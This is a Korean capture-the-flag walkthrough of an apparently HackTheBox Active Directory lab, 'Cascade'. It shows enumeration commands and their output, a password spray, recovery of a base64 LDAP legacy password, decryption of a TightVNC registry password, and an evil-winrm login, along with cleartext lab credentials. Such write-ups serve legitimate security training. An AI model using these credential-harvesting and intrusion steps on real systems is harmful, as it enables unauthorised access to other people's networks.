1. 정찰
1.1. nmap
nmap 을 통해서 정찰한 결과 특별하게 눈에 띄는 포트는 없고 88과 389 등의 포트를 서비스 하는 걸로 보아 AD 에 가입된 컴퓨터임을 알 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# nmap -sC -sV 10.129.42.135
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 19:23 +04
Nmap scan report for 10.129.42.135
Host is up (0.19s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-21 15:24:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-21T15:25:01
|_ start_date: 2025-12-21T10:58:53
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.44 seconds
1.2. rpcclient
rpcclient 를 통해서 접근했을 때 enumdomusers 를 통해서 유저들을 추출할 수 있었다. 이 내용은 users 파일에다가 저장을 했다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# rpcclient -U "" -N 10.129.42.135
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $>
1.3. 실패한 정찰
그 외에 smbmap 이나 smbclient 를 통해 익명으로 공유되는 폴더들을 리스팅 했을 때 확인되는 내용은 존재하지 않았다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# smbmap -H 10.129.42.135
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[!] Access denied on 10.129.42.135, no fun for you...
[*] Closed 1 connections
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# smbclient -N -L //10.129.42.135
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.42.135 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
1.4. 결론
주어진 자료는 도메인 주소 명과 계정 ID 뿐이다. 이전에 풀었던 Labs 중에 impacket-GetNPUsers 혹은 smb 서비스에 대해 아이디/비밀번호가 같은 게 있는 지를 확인하는 작업부터 진행해볼 것이다.
2. 내부망 침투
2.1. 실패 - impacket-GetNPUsers
가장 먼저 시도를 했으나 PreAUTH 된 계정이 존재하지 않아 찾을 수 없었다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# impacket-GetNPUsers 'CASCADE.LOCAL/' -usersfile users -outputfile hash -dc-ip 10.129.42.135
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
2.2. 실패 - nxc 를 이용한 smb ID/PW 일치 여부
혹시나 ID/PW 가 일치하는 계정이 있는지 확인하기 위해 살펴 보았으나 존재하지 않는 것을 확인할 수 있었따.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# nxc smb 10.129.42.135 -u users -p users --continue-on-success
SMB 10.129.42.135 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\CascGuest:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\arksvc:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\s.smith:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\r.thompson:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\util:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\j.wakefield:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\s.hickson:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\j.goodhand:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\a.turnbull:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\e.crowe:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\b:CascGuest STATUS_LOGON_FAILURE
SMB 10.129.42.135 445 CASC-DC1 [-] cascade.local\hanson:CascGuest STATUS_LOGON_FAILURE
[...SNIP...]
2.3. ldapsearch 를 이용한 정보 수집
이번 모듈에서는 ldapsearch 라는 것을 배운다.
2.3.1. ldapsearch 를 통한 기본 정보 수집
ldapsearch 에 관한 정보는 좌측 탭에서 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# ldapsearch -x -H ldap://10.129.42.135 -s base -b "" namingcontexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
우리는 이 중에서 DC=cascade,DC=local 탭을 통해서 더 자세한 정보를 확인할 수 있다. 그 중 Ryan Thompson 의 계정에 대해서 cascadeLegacyPwd 항목이 눈에 띈다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# ldapsearch -x -H ldap://10.129.42.135 -b "DC=cascade,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# cascade.local
dn: DC=cascade,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=cascade,DC=local
instanceType: 5
whenCreated: 20200109153132.0Z
whenChanged: 20251221105843.0Z
[...SNIP...]
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 19
codePage: 0
countryCode: 0
badPasswordTime: 134108054347592772
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
[...SNIP...]
clk0bjVldmE= 값에 대해서 복호화 해보면 아래와 같다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# echo 'clk0bjVldmE=' | base64 -d
rY4n5eva\
2.4. smb 공유폴더 식별
이전에 users 파일을 참고해 보면 해당 유저는 r.thompson 계정을 갖고 있을 것으로 추정할 수 있다. nxc 를 통해서 공유되는 폴더를 확인할 수 있다. 여기서 Data 폴더가 눈에 들어온다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# nxc smb 10.129.42.135 -u r.thompson -p rY4n5eva --shares
SMB 10.129.42.135 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.42.135 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.42.135 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.135 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.135 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.135 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.135 445 CASC-DC1 Audit$
SMB 10.129.42.135 445 CASC-DC1 C$ Default share
SMB 10.129.42.135 445 CASC-DC1 Data READ
SMB 10.129.42.135 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.135 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.135 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.135 445 CASC-DC1 SYSVOL READ Logon server share
2.5. Data 공유폴더 내용 확인
공유 폴더 내부에서 계정들과 관련된 폴더로 추정되는 것이 있는데, 그 중 s.smith 에서 VNC Install.reg 라는 파일을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# smbclient //10.129.42.135/Data -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> ls
. D 0 Mon Jan 27 07:27:34 2020
.. D 0 Mon Jan 27 07:27:34 2020
Contractors D 0 Mon Jan 13 05:45:11 2020
Finance D 0 Mon Jan 13 05:45:06 2020
IT D 0 Tue Jan 28 22:04:51 2020
Production D 0 Mon Jan 13 05:45:18 2020
Temps D 0 Mon Jan 13 05:45:15 2020
\Contractors
NT_STATUS_ACCESS_DENIED listing \Contractors\*
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\IT
. D 0 Tue Jan 28 22:04:51 2020
.. D 0 Tue Jan 28 22:04:51 2020
Email Archives D 0 Tue Jan 28 22:00:30 2020
LogonAudit D 0 Tue Jan 28 22:04:40 2020
Logs D 0 Wed Jan 29 04:53:04 2020
Temp D 0 Wed Jan 29 02:06:59 2020
[...SNIP...]
\IT\Temp\r.thompson
. D 0 Wed Jan 29 02:06:53 2020
.. D 0 Wed Jan 29 02:06:53 2020
\IT\Temp\s.smith
. D 0 Wed Jan 29 00:00:01 2020
.. D 0 Wed Jan 29 00:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 23:27:44 2020
smb: \>
2.6. VNC Install.reg 파일 톺아보기
2.6.1. 레지스트리 파일 분석
VNC 는 원격접속과 관련한 프로그램으로, 매번 비밀번호를 입력하기 번거로울 때 비밀번호를 암호화 한 후 하드코딩해서 저장해놓을 수 있다. 이와 관련된 파일에서 레지스트리를 통해서 비밀번호를 추출할 수 있다. 아래에서는 Password 에 대해서 hex:6b,cf,2a,4b,6e,5a,ca,0f 값을 저장하고 있는 모습을 확인할 수 있다.
본 내용과 관련해서는 vncpwd 와 관련한 항목을 참고하길 바란다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# cat VNC\ Install.reg
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
2.6.2. 복호화 및 비밀번호 추출
복호화를 진행하면 평문의 비밀번호를 얻을 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Cascade/Cascade-2]
└─# echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
┌──(root㉿kali)-[/home/…/labs/Cascade/Cascade-2/vncpwd]
└─# ./vncpwd ../vnc_enc_pass
Password: sT333ve2
2.7. user.txt 획득
s.smith 의 계정과 비밀번호를 모두 습득했으므로 evil-winrm 을 통해서 접근을 시도했고 flag 를 획득할 수 있었다.
┌──(root㉿kali)-[/home/…/labs/Cascade/Cascade-2/vncpwd]
└─# evil-winrm -i 10.129.42.135 -u s.smith -p sT333ve2
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> type ../Desktop/user.txt
3. 권한 상승
본 작업은 애플 실리콘 맥북에서 진행 중이므로 Windows 환경을 구축할 여력이 현재 되지 못하므로 넘어가도록 한다.